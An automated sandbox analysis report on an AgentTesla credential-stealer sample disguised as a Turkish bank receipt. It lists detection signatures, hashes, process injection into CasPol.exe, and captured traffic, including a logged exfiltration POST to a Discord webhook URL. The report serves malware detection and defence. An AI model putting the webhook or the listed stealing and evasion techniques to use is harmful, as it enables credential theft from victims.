Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e-dekont-20230206.exe

Overview

General Information

Sample Name:e-dekont-20230206.exe
Analysis ID:800718
MD5:33a5f92deee382035467caff29a8d487
SHA1:7e6daec4a2a4dde0f5148df4165fa8cebb7011e4
SHA256:e3b4406836308220da7989e5d539486ee1b71b4cc25a822e056993ab44675666
Tags:exegeoTUR
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • e-dekont-20230206.exe (PID: 5124 cmdline: C:\Users\user\Desktop\e-dekont-20230206.exe MD5: 33A5F92DEEE382035467CAFF29A8D487)
    • CasPol.exe (PID: 2256 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe MD5: F866FC1C2E928779C7119353C3091F0C)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.558103667.00000000033DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    Process Memory Space: CasPol.exe PID: 2256JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      Process Memory Space: CasPol.exe PID: 2256JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        No Sigma rule has matched
        Timestamp:192.168.2.5162.159.135.232497034432851779 02/07/23-18:41:32.301093
        SID:2851779
        Source Port:49703
        Destination Port:443
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: e-dekont-20230206.exeReversingLabs: Detection: 41%
        Source: e-dekont-20230206.exeVirustotal: Detection: 55%Perma Link
        Source: e-dekont-20230206.exeJoe Sandbox ML: detected
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49703 version: TLS 1.2
        Source: e-dekont-20230206.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: FUCKYOU.pdb source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: NNbHhH.pdb source: e-dekont-20230206.exe
        Source: Binary string: NNbHhH.pdbH source: e-dekont-20230206.exe

        Networking

        barindex
        Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49703 -> 162.159.135.232:443
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDNS query: name: api.ipify.org
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
        Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Feb 2023 17:41:32 GMTContent-Type: application/jsonContent-Length: 45Connection: closeset-cookie: __dcfduid=a8ea0446a70e11ed8d802657744d3ae7; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/strict-transport-security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2Bty7akNoWX6OC4aoE2iHe7LxHQHtrn188ZjWicZIiSBh1heuF9zsXpH9biouDi8l7hbBetRLrMi7Ya7Ieov%2FahcmIdQSLBEYWkkXiRzLyJCYMmwGMyfI%2B0e3oFmC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __sdcfduid=a8ea0446a70e11ed8d802657744d3ae7c23a0232fc8c5f932fd4f6c1c91175609cee1f861eccdf03b6a96c0a50384823; Expires=Sun, 06-Feb-2028 17:41:32 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/Set-Cookie: __cfruid=7623650af91c9a0c1d05a6a7bc2a77b0906cb4ae-1675791692; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 795deabcc9628fdd-FRA{"message": "Unknown Webhook", "code": 10015}
        Source: CasPol.exe, 00000001.00000002.560208417.0000000006262000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
        Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
        Source: CasPol.exe, 00000001.00000002.558103667.0000000003391000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31
        Source: CasPol.exe, 00000001.00000002.558103667.00000000033F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com4Dp
        Source: unknownHTTP traffic detected: POST /api/webhooks/1063267560818233445/Ga1uL1m9HE258QH4hqiVhVH5m98lA3rsO835awvMXcR1F31nnHHfghtrbDwRtJci1Osr HTTP/1.1Content-Type: multipart/form-data; boundary=----------42b446e635b543ad97de25b01e6979b4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: discord.comContent-Length: 1224Expect: 100-continueConnection: Keep-Alive
        Source: unknownDNS traffic detected: queries for: api.ipify.org
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
        Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.5:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 162.159.135.232:443 -> 192.168.2.5:49703 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06B90290 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,06B92078,00000000,000000001_2_06B90290
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D907640_2_00007FF9A5D90764
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D96CAD0_2_00007FF9A5D96CAD
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D908160_2_00007FF9A5D90816
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A3C5B01_2_05A3C5B0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A317A01_2_05A317A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A317721_2_05A31772
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A301A01_2_05A301A0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A393281_2_05A39328
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06B90D201_2_06B90D20
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06B99DF01_2_06B99DF0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06F442D01_2_06F442D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06F4E0881_2_06F4E088
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06F4B1781_2_06F4B178
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06F47C081_2_06F47C08
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06F48BC01_2_06F48BC0
        Source: e-dekont-20230206.exeStatic PE information: No import functions for PE file found
        Source: e-dekont-20230206.exe, 00000000.00000000.291653847.0000022E8D92C000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNNbHhH.exe. vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296795377.0000022E9F6E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamec4a5f7b8-6b1b-4e41-a389-a4734cc6954b.exe4 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameFUCKYOU.dll0 vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exe, 00000000.00000002.295935631.0000022E8D9D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exeBinary or memory string: OriginalFilenameNNbHhH.exe. vs e-dekont-20230206.exe
        Source: e-dekont-20230206.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: e-dekont-20230206.exeReversingLabs: Detection: 41%
        Source: e-dekont-20230206.exeVirustotal: Detection: 55%
        Source: e-dekont-20230206.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\e-dekont-20230206.exe C:\Users\user\Desktop\e-dekont-20230206.exe
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e-dekont-20230206.exe.logJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/2
        Source: e-dekont-20230206.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 47.53%
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csCryptographic APIs: 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.csCryptographic APIs: 'TransformFinalBlock'
        Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: 1.2.CasPol.exe.400000.0.unpack, A/N1.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: e-dekont-20230206.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: e-dekont-20230206.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: e-dekont-20230206.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: FUCKYOU.pdb source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: FUCKYOU.pdbxc source: e-dekont-20230206.exe, 00000000.00000002.296544306.0000022E8F6E1000.00000004.00000800.00020000.00000000.sdmp, e-dekont-20230206.exe, 00000000.00000002.296374336.0000022E8DC30000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: NNbHhH.pdb source: e-dekont-20230206.exe
        Source: Binary string: NNbHhH.pdbH source: e-dekont-20230206.exe

        Data Obfuscation

        barindex
        Source: e-dekont-20230206.exe, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs.Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs.Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, SdRVZOuA41VO3Qkhg8/Hbk6J2G275BdoJl0CG.cs.Net Code: xxNjTM0rD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.cs.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D9826D push edi; retf 0_2_00007FF9A5D9826E
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D9821E push edi; retf 0_2_00007FF9A5D9821F
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D9890E push eax; retf 0_2_00007FF9A5D9890F
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeCode function: 0_2_00007FF9A5D9841A push ebp; retf 0_2_00007FF9A5D9841B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A37C9A push eax; retf 1_2_05A37CA1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A37499 push FFFFFF8Bh; iretd 1_2_05A3749E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A37CE0 pushfd ; retf 1_2_05A37CE1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A38424 push esp; iretd 1_2_05A38829
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A337B7 pushad ; iretd 1_2_05A337F9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_05A37E40 push 6C66h; ret 1_2_05A37E5A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_06B9CF26 push es; retf 1_2_06B9CF2C
        Source: e-dekont-20230206.exeStatic PE information: 0xEC8B859F [Tue Oct 4 11:38:07 2095 UTC]
        Source: initial sampleStatic PE information: section name: .text entropy: 7.97077131969678
        Source: e-dekont-20230206.exe, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csHigh entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
        Source: 0.2.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csHigh entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
        Source: 0.0.e-dekont-20230206.exe.22e8d880000.0.unpack, WHFDtbAvAuefNBieNZ/MBloaf2FamTksiyQF0.csHigh entropy of concatenated method names: '.cctor', 'DoLrRC2aiV2ty', 'jKwJEdlLh', 'nIjkqkxau', 'l3W9dARdo', 'UOsUD22g2', 'ccEEpyD4X', 'YloYafFam', 'WksgiyQF0', 'WHFyDtbvA'
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\e-dekont-20230206.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
